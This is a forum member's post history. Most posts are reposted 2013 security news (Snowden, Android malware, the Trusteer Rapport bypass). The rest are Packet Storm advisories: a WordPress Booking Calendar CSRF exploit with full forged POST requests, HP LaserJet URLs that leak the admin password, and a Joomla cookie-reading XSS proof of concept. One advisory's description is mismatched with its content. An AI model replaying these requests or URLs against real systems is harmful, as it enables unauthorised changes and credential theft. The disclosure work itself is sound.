Everything posted by Matt

  1. BRASÍLIA - Brazil-based American reporter Glenn Greenwald said Tuesday that he had received more than 15,000 secret US government documents from intelligence leaker Edward Snowden.

     Greenwald, who revealed details of Washington's vast electronic surveillance program in Britain's Guardian newspaper, gave no details of the content of the files as he testified before the Brazilian Senate's foreign relations committee.

     "I did not do an exact count, but he gave me 15,000, 20,000 documents. Very, very complete and very long," Greenwald said, responding to questions from lawmakers. "The stories we have published are a small portion. There will certainly be more revelations on the espionage activities of the US government and allied governments (...) on how they have penetrated the communications systems of Brazil and Latin America," he said.

     He added that he could not give more details on the documents because an investigation of Snowden is under way in the United States.

     "The pretext (given by Washington) for the spying is only one thing: terrorism and the need to protect the (American) people. But the reality is that there are many documents which have nothing to do with terrorism or national security, but have to do with competition with other countries, in the business, industrial and economic fields," Greenwald said.

     Referring to the XKeyscore secret surveillance system allegedly used by NSA to monitor Internet traffic, he said Washington was collecting not just metadata, "but also the content of emails and what is being discussed in telephone conversations. It is a powerful program which frightens."

     In an interview with AFP last month, Greenwald explained that Snowden personally handed him the documents in Hong Kong, where the former NSA contractor temporarily took refuge, after fleeing the United States.

     The Brazilian O Globo magazine carried stories alleging that Washington maintained a spy center in Brasilia which was part of a network of 16 such facilities around the world to intercept foreign satellite transmissions.

     Last month, US Vice President Joe Biden called Brazilian President Dilma Rousseff to provide an explanation following press reports of US electronic surveillance in Brazil based on leaks from Snowden, a former US National Security Agency contractor.

     Snowden is now a fugitive from US justice and is currently living at an unknown location in Russia after Moscow granted him temporary asylum for a year on August 1.

     Source: SecurityWeek.com
  2. Google's Android mobile operating system is being overwhelmed by cybercriminals creating malware apps, to the point that the number of malware programs will reach the one million mark by the end of 2013, Trend Micro warns.

     This information comes from the company's Security Roundup report for the second quarter of the year, which shows that the number of malicious Android apps grew by 350,000 in the first half of 2013, reaching 718,000 by June of this year. Trend Micro said this is due to hackers wanting to exploit the growing global base of Android users.

     "The open Android ecosystem continues to be exploited by cybercriminals, with the number of malware apps growing from 509,000 in the first quarter of the year and set to reach the one million mark by the end of 2013," the Trend Micro report said, adding that most malware apps are packaged to look like popular smartphone apps. "Malware has been found even in the official Google Play store, making security software an essential tool for preventing downloads of malware apps."

     The most common malware apps accounted for 44% of the total number of apps identified and worked by subscribing users to services, or using services, without their knowledge, sending text messages to premium-rate numbers, with the malware developer collecting the resulting profit. At 24%, the second most common category of malware apps is those that steal data, followed by adware and apps that download malicious content.

     This type of malware is on the rise because of the fragmented nature of the Android user base. Because it is difficult for patches to reach all users within an effective time frame, some users will never receive these patches, as vendors leave their customers to bear the risk of attacks, the report says.

     The security company noted that this threat will continue to grow rapidly until smartphone vendors recognise the urgent need to protect users in the same way PC vendors do. The growing number of malware toolkits made available on the black market for free, as two-for-the-price-of-one deals or through other offers, was also noted in the report.

     Trend Micro advises that third-party security software is essential to prevent malware downloads.

     Source: THE INQUIRER - News, reviews and opinion for tech buffs
  3. More than half of companies say fast access to data and information is critical or very important

     According to a survey conducted by SAP AG (NYSE: SAP), the global market leader in business software solutions, 20% of private companies worldwide intend to implement in-memory technologies in the next year for real-time access to data and information, while more than 10% of them are in the middle of implementing the new database technologies. In addition, about a third of the responding companies intend to implement such technologies in the next two or three years.

     "Adoption of in-memory technology is an increasingly visible trend in Western markets, as more and more managers have become convinced of the benefits of these technologies, which process massive amounts of data in a very short time compared with traditional databases. As a result, organisations in any industry can manage all critical operational processes in real time, which means these companies become a benchmark for firms in other markets as well, including the local one," said Valentin Tomsa, general manager of SAP Romania.

     More than 50% of the responding companies consider fast access to information critical or very important for the well-being of the organisation, and only under 5% of them attach no importance to fast data access.

     Regarding the advantages of in-memory technologies, more than half of the companies rated the ability to report operational information in real time as the greatest benefit, with the next advantages identified being faster data storage and processing and improved planning and forecasting capability. The ability to run predictive analyses and produce reports in an extremely short time was also valued by about 20% of the responding companies.

     SAP's in-memory computing platform, the most dynamic product in the company's portfolio

     The SAP HANA in-memory platform is the fastest-growing product in the SAP portfolio and currently has more than 1,500 customers, with the solution implemented in all 25 of SAP's business verticals, including sports, retail and healthcare, where new opportunities and business models are still being developed. Adoption across a wide range of fields is a clear sign of the maturity and high level of applicability of the SAP HANA platform.

     In addition, through the SAP Business Suite solution package, recently launched on HANA, organisations can manage all critical business processes in real time, such as budget planning and execution, reporting or analysis of financial data, in order to use the most relevant information in the company's development strategy. Companies can significantly accelerate their activity and grow by following business scenarios generated in real time.

     SAP has also developed a package of support services, as well as a rapid-deployment solution, that lets all existing customers migrate their own database to the SAP HANA platform without interruption and in a very short time.

     About SAP

     As market leader in business software solutions, SAP (NYSE: SAP) helps companies of any size and in any type of industry run their business better. From the back office to the boardroom, from warehouses to points of sale, from the computer to mobile communication tools, SAP gives people and organisations the confidence and power to work together efficiently and to use the internal resources of the business effectively, so as to stay a step ahead of competitors. SAP applications and services help more than 238,000 customers manage operations and resources profitably, adapt continuously and grow sustainably. For more information, visit www.sap.com

     Source: www.totalpr.ro
  4. The maximum sentence facing Bradley Manning, the WikiLeaks "mole", has been reduced from 136 to 90 years following the judge's decision to merge certain penalties, the US Army announced on Tuesday, as reported by international news agencies.

     The 25-year-old soldier was found guilty on 30 July of 20 of the 22 counts against him, notably five violations of espionage law, but was acquitted of the most serious charge, that of conspiring with the enemy.

     At a hearing held on Tuesday to determine his sentence, Judge Denise Lind found that "certain charges are repeated as far as the sentence is concerned" and ordered them dissolved, the US Army said in a statement, without specifying which counts are involved.

     Bradley Manning, who has admitted passing some 700,000 diplomatic and military documents to the WikiLeaks website, therefore faces a total of 90 years in prison on charges of espionage, computer fraud, theft of information from the US government and insubordination in the army. He pleaded guilty to ten of these counts, carrying a total of 20 years in prison.

     The trial, which began in early June at the Fort Meade base, north of Washington, is scheduled to last until 23 August and will continue this week with the prosecution and defence hearing witnesses in order to settle the length of his sentence, AFP notes.

     Source: Business24.Ro
  5. Geek comedian Tom Scott imagines citizen volunteers accessing the real-time data store of spy agencies to help keep the country safe.

     Imagine that the NSA and the U.K.'s GCHQ opened their databases and tools to public volunteers to aid them in the search for terrorists. Tom Scott, who is described as a British geek comedian, programmer, and presenter, produced a video, "Oversight: Thank you for volunteering, citizen," that imagines ordinary citizens accessing the databases of everything about everyone to assist governments in their surveillance activities.

     Scott's "Oversight" program lets ordinary citizens click on potential threats as they are logged, such as an e-mail with the words "blowing things up" in it; view the information; and add information to spy agency databases.

     "Is it a jokey e-mail between friends? Or a serious incident worth reporting to the police," the presenter asks. "You now have the tools to find out. You can read the subject lines of e-mails, the Web sites they visited, information from social networks, location history, credit card purchases, and information about friends and family."

     If that's not enough information, Oversight lets citizen volunteers click to apply for a search warrant, which is normally granted in 15 to 30 seconds. It's a bit beyond the Department of Homeland Security's "If you see something, say something" campaign.

     http://asset0.cbsistatic.com/cnwk.1d/i/tim2/2013/08/06/Screen_Shot_2013-08-06_at_4.15.32_PM_610x241.png

     Scott told CNET that the video has been well received, but a lot of people find it unsettling. "There have been a few replies from people who said they'd sign up as a volunteer right away. One or two have even said that they'd actually be in favor of setting up Oversight. Provided, of course, that there were 'safeguards' in place," he said.

     Like for the elephant.

     Source: News.Cnet.Com
  6. With incentives, the government aims to entice power utilities, water infrastructure, and transportation networks to sign onto its upcoming Cybersecurity Framework.

     With the goal of avoiding a massive cyberattack on U.S. infrastructure, the White House has proposed a handful of incentives to get power plants, water companies, and transportation networks to join a national cybersecurity program.

     "The systems that run our nation's critical infrastructure such as the electric grid, our drinking water, our trains, and other transportation are increasingly networked," the White House wrote in a blog post Tuesday. "As with any networked system, these systems are potentially vulnerable to a wide range of threats, and protecting this critical infrastructure from cyber threats is among our highest security priorities."

     Chaired by the Department of Homeland Security, the program incentives offered to companies include cybersecurity insurance, priority consideration for grants, and streamlined regulations. To get these incentives, the critical infrastructure companies must agree to adopt certain tech practices within the government's upcoming Cybersecurity Framework. These proposed incentives are a preliminary step for the government's cybersecurity policy and have not yet been finalized.

     The White House has been working to tighten up the country's cybersecurity over the past couple of years. In February, President Barack Obama signed an executive order that he said will "strengthen our cyber defenses by increasing information sharing, and developing standards to protect our national security, our jobs, and our privacy."

     The president also signed an executive order in July 2012 which detailed emergency Internet control. This order was designed to empower certain governmental agencies with control over telecommunications and the Web during natural disasters and security emergencies.

     It's probably a wise decision for the government to have cybersecurity on the front burner. Weeks after the head of Homeland Security, Janet Napolitano, announced that she believed a "cyber 9/11" could happen "imminently" -- crippling the country's power grid, water infrastructure, and transportation networks -- hackers hit the U.S. Department of Energy. While no data was compromised in this attack, it did show that hackers were able to breach the government's computer system.

     In May, Congress released a report that claimed power utilities in the U.S. are under "daily" cyberattacks. Of about 160 utilities surveyed in the report, more than a dozen reported "daily," "constant," or "frequent" attempted cyberattacks on their computer systems. While the data in the report sounded alarming, none of the utilities reported any damage to their facilities or actual breaches of their systems -- but rather attempts to hack their networks.

     The proposed incentives are a part of the White House's Cybersecurity Framework, which should be complete by October. A final framework is scheduled to be released in February. Critical infrastructure companies will be encouraged to sign onto this framework.

     Source: TheRegister.co.uk
  7. Barely two months after rolling out two-factor authentication, Twitter has beefed up its login procedures yet again, both to improve security and to make two-factor available to more Twitter users worldwide.

     Twitter launched two-factor authentication in late May with a system based on SMS messaging. While that was good enough for many users, however, it did present some problems. For one thing, verification via SMS is only available via supported mobile carriers, which isn't all of them. For another, using SMS as a security mechanism relies on the SMS delivery channel being secure, and some carriers' text messaging systems might not be.

     On Tuesday, Twitter rolled out an update to its two-factor authentication scheme that can optionally make use of the Twitter mobile app for Android and iOS, rather than SMS.

     "Simply tap a button on your phone, and you're good to go," Twitter security engineer Alex Smolen wrote in a blog post. "This means you don't have to wait for a text message and then type in the code each time you sign in on twitter.com."

     The app approach offers other advantages, as well. Because it's based on public-key cryptography, it's inherently more secure than the SMS approach. The mobile app generates a public/private key pair and Twitter only stores the public key, while the private key never leaves the user's phone. As a result, an attacker won't be able to fake a login even if Twitter's authentication server is compromised.

     When the app receives a login verification request, it will also tell you details about the browser that is being used to make the login attempt, including its approximate location – so if you see any suspicious logins from Iran, you'll know not to approve them.

     The app also generates a "backup code" during the setup process, which it advises you to write down and keep in a safe place. In the event you ever lose your phone, you can use the backup code to log in to Twitter, un-enroll your old phone from login verification, and enroll your new one.

     As before, login verification is optional and can be enabled from any Twitter account's Settings panel. To take advantage of the new, app-based authentication process, you'll need to update to version 5.9 of the Twitter app for iOS or version 4.1.4 of Twitter for Android, both of which shipped on Tuesday. ®

     Source: TheRegister.co.uk
  8. Trusteer has dismissed reports that criminals are exploiting a vulnerability in its Rapport browser-lockdown technology that is used by leading banks such as HSBC and NatWest.

     Trusteer chief executive officer Mickey Boodaei told V3 that recent reports of an exploitable vulnerability in its Rapport banking service are inaccurate as it does not work, confirming the company is aware of the issue and has already taken appropriate action.

     "There is no malware that incorporates this vulnerability. Moreover, Trusteer has accurate intelligence on the fraudsters who wrote, sold, and published this code, which we shared with law enforcement agencies," he said.

     "This is just one out of many attempts to circumvent Rapport, which we fight on an ongoing basis. This time with great success as the group that wrote this code is most likely responsible for various fraudulent activities against UK banks."

     Trusteer's Rapport technology is used by numerous financial firms, including NatWest and HSBC in the UK, and is designed to protect the banks' customers against Trojans, like the infamous Zeus.

     The vulnerability was first reported on the Full Disclosure forum and reportedly lets crooks bypass the browser's lockdown security features to sneak a banking Trojan onto the victim's machine. Reports have since emerged about a number of cybercrime forums, suggesting that criminals are already exploiting the security vulnerability. However, Trusteer said this exploit does not work.

     Trusteer chief technology officer Amit Klein added that a patch fix is already available and is being automatically rolled out to all Rapport customers. "The patch for this vulnerability is available and is being rolled out automatically to the entire Trusteer Rapport customer base. No action is required from Rapport users," he said.

     "This vulnerability has no impact on Rapport's ability to block financial malware like Zeus, KINS, Carberp, Gozi, Tilon and Citadel as Rapport uses additional mechanisms, other than the mechanism impacted by this vulnerability, to block these malware strains. Furthermore, there is no financial malware to date that is trying to exploit this vulnerability."

     The financial industry is one of cyber criminals' most common targets. Most recently hackers hit the NASDAQ community forum with a password-stealing cyber raid.

     Source: V3.co.uk
  9. Renowned hackers Charlie Miller and Chris Valasek have released tools capable of hijacking control of moving cars to the general public.

     Miller and Valasek released the tools alongside a white paper explaining their research. The tools relate to the 2010 Toyota Prius and the 2010 Ford Escape and let hackers remotely take control of the cars' electronic smart steering, braking, acceleration, engines and lights.

     Miller and Valasek originally showed off the attack with a live demonstration at the Defcon hacker conference at the start of August. The paper shows the specific processes required to hack various different electronic components to enact specific commands.

     At the time of publishing Ford and Toyota had not responded to V3's request for comment on the research.

     Miller and Valasek said the research is designed to prove that smartcar manufacturers take an inadequate approach towards security. The white paper said: "When electronic networked components are added to any device, questions of the robustness and reliability of the code running on those devices can be raised. When physical safety is in question, as in the case of the automobile, code reliability is a more important and practical concern.

     "In typical computing environments, such as a desktop computer, it is possible to easily write scripts or applications to monitor and adjust the way the computer runs. Yet, in highly computerised automobiles, there is no easy way to write applications capable of monitoring or controlling the various embedded systems. Drivers and passengers are strictly at the mercy of the code running in their automobiles and, unlike when their web browser crashes or is compromised, the threat to their physical wellbeing is real."

     Miller and Valasek said they hope by releasing the tools other hackers will build on their work, helping create answers to modern cars' security issues.

     "Besides discussing new attacks, this paper aims to bring accessibility to automotive systems to security researchers in an open and transparent way. Currently, there is no easy way to write custom software to monitor and interact with the engine control units (ECUs) in modern automobiles. The fact that a risk of attack exists but there is not a way for researchers to monitor or interact with the system is distressing," read the white paper.

     "This paper is intended to provide a framework that will allow the construction of such tools for automotive systems and to demonstrate the use on two modern vehicles. This framework will allow researchers to demonstrate the threat to automotive systems in a concrete way as well as write monitoring and control applications to help alleviate this threat."

     Car security has been a growing area of interest within the research community. Prior to Miller and Valasek's release, Volkswagen won a high court ruling blocking University of Birmingham lecturer Flavio Garcia from releasing a similar research paper.

     Source: V3.co.uk
  10. God, what an idiot.
  11. A firefighter, you say? Well, get ready, because you might get to deal with a few fires around here.
  12. Earlier this year we took a look at SSD caching, an alternative way of getting some SSD performance added to a system without too much strain put on the finances. So how about a gander at the other end of the spectrum – huge capacity and performance and a total disregard for the budget? Enter the KingSpec Multicore MC1S81M2T, a 2TB PCI-Express SSD costing a mere three-and-a-half grand.

     KingSpec Multicore MC1S81M2T 2TB PCI-E SSD

     KingSpec may be a new name to a lot of people, but it has been producing flash-based drives since 2005. It is only recently that its products have been available to buy in the UK, though. Available by special order only from UK distributors Quiet PC, the MC1S81M2T is KingSpec’s current flagship from the PCI-E SSD range – which also includes 1TB and 500GB versions for a good deal less.

     This SSD is a monster of a card with eight of the company's 240GB mSATA drives (each drive using 25nm MLC NAND) bolted on to a PCB and then built into a RAID 0 array to deliver its 2TB capacity. Each of the drives features a dedicated LSI SandForce SF2281 controller and the whole shooting match is controlled by an LSI SAS2008 SAS controller (6Gbps SAS/SATA, 8x PCI-E interface).

     So, to recap, that’s eight LSI SandForce controllers feeding a SAS controller going through an 8x PCI-E slot on the motherboard, all of which gives the MC1S81M2T some pretty astonishing headline speeds. Ignoring for a moment the quoted sustained read speed of 4GB/s, which is the theoretical read speed, the actual read speed achieved in tests is still pretty mind-blowing: a whopping 2.59GB/s (yes that’s GB/s not MB/s) reads and 2.36GB/s writes.

     6Gb/s brickwall

     So why go down the PCI-Express bus route? Well, the figures speak for themselves. And yet for really large capacity coupled with high speed transfer rates, good old SATA interface doesn’t quite cut the mustard anymore. Hence, the attention turns to some other form of interface, namely the PCI-Express bus of the motherboard.

     The current crop of PCI-E based drives are an indication of where the future lies for the performance SSD. While the 6Gbit/s SATA interface – once the godsend for the performance SSD – is now its Achilles heel, as even mainstream drives can now almost flood the interface.

     The next generation of drives will almost certainly be based around SATA-Express. The specification is currently undergoing the SATA-IO (The Serial ATA International Organization) ratification process, with drives hopefully appearing in late 2013 early 2014. Using the PCI-E bus will allow drive interface speeds of up to 1GB/s per lane as opposed to the 0.6GB/s of the current SATA interface. Eventually the technology should see storage devices with up to 16Gb/s interfaces.

     Source: TheRegister.co.uk
  13. Matt

    Steam

    So what are you up to? Asking everyone for free cs:go accounts and then selling them or trading them? https://rstforums.com/forum/73384-cs-go.rst
  14. This "impossible to crack" thing.. I don't know how it is for you, but I have learned something over all these years. My opinion is that nothing is "uncrackable" any more. I believe that for anything secured there is a cure, even if we don't know it and may never know that it exists. Nothing is safe any more. Not even toilets.
  15. Probably when the card is created a larger number of scans will be allowed, something like 2-3 people. That way your brother can empty your card too.
  16. I didn't give orders to anyone and I didn't get worked up either. If I don't let you walk all over me and I don't answer the way you want, does that mean I'm getting worked up? You care too much about me, more than about yourself. Please mind your own business.
  17. This is the future. Fanciful ideas that we used to see only in films are already starting to be "designed". In any case facial recognition is much more secure.. now it also depends on the evolution of those who do black hat.
  18. Matt

    TOR Firefox 0-day

    https://bugzilla.mozilla.org/show_bug.cgi?id=901365
  19. Cybercrooks on an underground forum have developed a technique to bypass anti-Trojan technology from Trusteer used by financial institutions worldwide – including HSBC and Paypal – to protect depositors from cybersnoopers.

     Trusteer has downplayed the vulnerability and said it's in the process of rolling out beefed-up protection anyway. However, independent security researchers who first spotted the exploit warn that bank customers remain at risk.

     Trusteer's Rapport browser lock-down technology is offered as a voluntary download by 50 banks worldwide, including NatWest and HSBC in the UK. US customers include ING Direct USA; eBay and PayPal also offer it to their customers as protection against banking Trojans.

     An exploit on private cybercrime forums, spotted by digital forensics firm Group-IB, offers a means to bypass the browser lock-down technology. More precisely, Trusteer Rapport versions 1208.41 and below suffer from a memory modification vulnerability that turns off "Rapport's selfcheck unhooking and intercepting system" APIs. More technical details of the flaw can be found in a post over the weekend on a full disclosure mailing list here.

     "With the help of this new exploit it is possible to intercept users' credentials when Trusteer Rapport is active," explained Andrey Komarov, head of international projects at Group-IB.

     Members of the cybercrime forum have started to use the trick to bypass Rapport checking, which prevents the theft of users' credentials – including login details for online banking services - through interception, according to Komarov.

     In a statement Amit Klein, CTO at Trusteer, downplayed the seriousness of the flaw. Klein said the bug only affected one of the protection layers offered to customers by the software.

     The patch for this vulnerability is available and is being rolled out automatically to the entire Trusteer Rapport customer base. No action is required from Rapport users. This vulnerability has no impact on Rapport's ability to block financial malware like Zeus, KINS, Carberp, Gozi, Tilon and Citadel as Rapport uses additional mechanisms, other than the mechanism impacted by this vulnerability, to block these malware strains. Furthermore, there is no financial malware to date that is trying to exploit this vulnerability.

     An advisory along the same lines, a copy of which has been seen by El Reg, was sent to Trusteer's banking customers on Monday. This advisory adds the important caveat that "the combination of this vulnerability with a new (i.e. unknown, not currently seen in the wild) strain of malware, for which Rapport doesn’t apply multiple layers of protection, could result in a successful bypass of Rapport’s protection."

     The bypass is still in play, according to Komarov. "It is still unpatched, we can create a similar video on the actual [current] version of Rapport, where the bypass will be still working," he told El Reg. "Because of leakage of source codes of SpyEye and Carberp, there are already some recompiled copies which use this exploit to bypass its security."

     Komarov added that Group-IB is profiling teams of hackers who have already started to use this bug. Some of these hackers had previously released Anti-Rapport modules to SpyEye and ZeuS, the two most widely used banking Trojan tools abused by cybercriminals over recent years. Cybercrime forums have been active with discussions about possible mechanisms to bypass Trusteer since 2010, Komarov added. ®

     Source: Theregister.co.uk
  20. What I post is none of your business. Don't talk if you don't know me; when you asked me something, even though I didn't know you, I spoke to you politely. // I understand that you like seeing the Feed full of Off-Topic posts, the way it was all weekend, but please avoid such discussions. If you like it, come in; if you don't like it, don't come in and don't comment.
  21. Description : Booking Calendar WordPress plugin version 4.1.4 suffers from a cross site request forgery vulnerability.
      Author : Dylan Irzi
      Source : Booking Calendar 4.1.4 Cross Site Request Forgery ≈ Packet Storm
      Code :

      ###########################################################################################
      # Exploit Title: CSRF Plugin Booking Calendar 4.1.4 – WordPress
      # Date: August 4, 2013
      # Exploit Author: Dylan Irzi
      # Credit goes for: websecuritydev.com
      # Vendor Homepage: http://wpbookingcalendar.com/
      # Tested on: Win8 & Linux Mint
      # Affected Version : 4.1.4
      #
      # Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
      # Greetz: all team WebSecuritydev.
      ###########################################################################################

      CSRF VIA POST.

      Add new.
      http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

      POST:
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
      Accept: */*
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
      Content-Length: 311
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache
      -----------------------------------------------------------
      ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%40gmail.com~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES
      ---------------------------------------------------------
      ---------------------------------------------------------

      Delete:
      Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

      Post:
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
      Accept: */*
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
      Content-Length: 104
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache
      ---------------------------
      ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES
      ---------------------------------------------------------
      ---------------------------------------------------------

      << Approve Event >>
      URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

      POST:
      Host: localhost
      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0 AlexaToolbar/alxf-2.18
      Accept: */*
      Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      X-Requested-With: XMLHttpRequest
      Referer: http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
      Content-Length: 128
      Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271; wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b; PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0
      Connection: keep-alive
      Pragma: no-cache
      Cache-Control: no-cache
      ---------------------------------------------------------
      ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES
      ---------------------------------------------------------
      ---------------------------------------------------------

      --
      *By Dylan Irzi @Dylan_Irzi11 Security Pentest. WhiteHat. *
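The three request bodies in the advisory above carry only predictable fields (`ajax_action`, `booking_id`, `user_id`), so the server cannot tell a request made by its own admin page from one forged by another site. The PHP below is an added example, not the plugin's code: it binds a token to the session and to the `ajax_action` name and refuses requests without it. The `csrf_token()` and `handle()` functions, the key and the session id are constructed for the demonstration.

```php
<?php
// Added example: per-session, per-action anti-CSRF token for the
// ajax_action values the advisory lists. Not the plugin's code; the key
// and the session id are constructed for the demonstration.
declare(strict_types=1);

const STATE_CHANGING = ['INSERT_INTO_TABLE', 'DELETE_APPROVE', 'UPDATE_APPROVE'];

function csrf_token(string $secret, string $sessionId, string $action): string
{
    // The HMAC binds the token to one session and one action, so a token
    // issued for one operation cannot authorize a different one.
    return hash_hmac('sha256', $sessionId . "\0" . $action, $secret);
}

function handle(array $post, string $secret, string $sessionId): string
{
    $action = $post['ajax_action'] ?? '';
    if (!is_string($action) || !in_array($action, STATE_CHANGING, true)) {
        return '400 unknown action';
    }
    $sent = $post['csrf_token'] ?? '';
    // hash_equals() compares in constant time.
    if (!is_string($sent) || !hash_equals(csrf_token($secret, $sessionId, $action), $sent)) {
        return '403 missing or invalid token';
    }
    return "200 $action accepted";
}

$secret  = random_bytes(32);          // server-side key, never sent to the browser
$session = 'constructed-session-id';  // stands in for the logged-in admin's session

// Body of the advisory's delete request: it has no token, so it is refused.
$body = 'ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES';
parse_str($body, $forged);
echo handle($forged, $secret, $session), PHP_EOL;

// The same request sent by the site's own page, which embeds the token.
$legit = ['csrf_token' => csrf_token($secret, $session, 'DELETE_APPROVE')] + $forged;
echo handle($legit, $secret, $session), PHP_EOL;

// A token minted for another action does not carry over.
$cross = ['csrf_token' => csrf_token($secret, $session, 'UPDATE_APPROVE')] + $forged;
echo handle($cross, $secret, $session), PHP_EOL;
```

In a WordPress plugin the same check is normally done with the core nonce functions (`wp_create_nonce()`, `check_ajax_referer()`) together with a `current_user_can()` capability check on the approve and delete actions.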
  22. Description : This is the malicious javascript for the Firefox 0-day created to target Tor users leveraging the .onion sneaker net. The shellcode is supposedly neutered but test at your own risk.
      Download : Download: TOR Firefox 0-day ≈ Packet Storm
  23. Description : This is the malicious javascript for the Firefox 0-day created to target Tor users leveraging the .onion sneaker net. The shellcode is supposedly neutered but test at your own risk.
      Author : Michal Sajdak
      Source : HP LaserJet Credential Disclosure / Missing Authentication ≈ Packet Storm
      Code :

      Some of the networked HP LaserJet printers have hidden URLs hardcoded in the firmware. The URLs are not authenticated and can be used to extract admin password in plaintext – among other information like WiFi settings (including WPS PIN).

      Models affected:
      HP LaserJet Pro P1102w,
      HP LaserJet Pro P1606dn,
      HP LaserJet Pro CP1025nw,
      HP LaserJet Pro M1212nf MFP,
      HP LaserJet Pro M1213nf MFP,
      HP LaserJet Pro M1214nfh MFP,
      HP LaserJet Pro M1216nfh MFP,
      HP LaserJet Pro M1217nfw MFP,
      HP LaserJet Pro M1218nfs MFP,
      Possibly others(?)

      URLs details:
      Here are at least two interesting URLs, which can be accessed without authentication:

      http://IP_ADDRESS/dev/save_restore.xml
      (gives admin password/configuration parameters in plaintext)

      http://IP_ADDRESS:8080/IoMgmt/Adapters/wifi0/WPS/Pin
      (gives WPS PIN in plaintext)

      Original disclosure:
      http://sekurak.pl/hp-laserjet-pro-printers-remote-admin-password-extraction/

      Original information from HP:
      https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigationalState%3DdocId%253Demr_na-c03825817-1%257CdocLocale%253D%257CcalledBy%253D&javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&ac.admitted=1375697666155.876444892.199480143

      History
      19.04.2013 vendor notified
      19.04.2013 initial vendor response received
      24.04.2013 issue confirmed
      26.07.2013 new firmwares released
      31.07.2013 issues summary published by vendor
      02.08.2013 disclosure

      --
      Michal Sajdak, Securitum
  24. Description : Joomla versions 3.1.5 and below suffer from a reflective cross site scripting vulnerability in example.php.
      Author : Emilio Pinna
      Source : Joomla 3.1.5 Cross Site Scripting ≈ Packet Storm
      Code :

      ============================================================
      - Original release date: August 05, 2013
      - Discovered by: Emilio Pinna (Application Security Analyst at Abinsula)
      - Contact: (emilio (dot) pinn (at) gmail (dot) com)
      - Severity: 4.3/10 (Base CVSS Score)
      ============================================================

      VULNERABILITY
      -------------------------
      Joomla core package <= 3.1.5 includes a PHP script that suffers from reflected XSS vulnerability that allows to inject HTML and malicious scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Joomla is one of the most installed CMS with dozens of millions of installations.

      DESCRIPTION
      -------------------------
      Affected file libraries/idna_convert/example.php has different injection points:
      - Unsanitized lang parameter in line 24
      - Unsanitized file name printing on lines 112 and 119

      PROOF OF CONCEPT
      -------------------------
      http://localhost/joomla/libraries/idna_convert/example.php?lang="><script>alert(document.cookie);</script><!--

      BUSINESS IMPACT
      -------------------------
      As usual, attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session that visits the malicious crafted url.

      SYSTEMS AFFECTED
      -------------------------
      Joomla-CMS <= 3.1.5

      SOLUTION
      -------------------------
      Fixed removing the vulnerable example file on git with commit c00c033d33d901e1ca6be9061a44e55acd041b1f

      REFERENCES
      -------------------------
      http://disse.cting.org/2013/08/05/joomla-core-3_1_5_reflected-xss-vulnerability/
      https://github.com/joomla/joomla-cms/issues/1658

      CREDITS
      -------------------------
      Emilio Pinna (emilio (dot) pinn (at) gmail (dot) com)

      DISCLOSURE TIMELINE
      -------------------------
      August 4, 2013: Opened a ticket describing the bug by Adam Willard.
      August 5, 2013: Fixed by Michael Babker.
      August 5, 2013: Vulnerability disclosed by Emilio Pinna.

      LEGAL NOTICES
      -------------------------
      The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
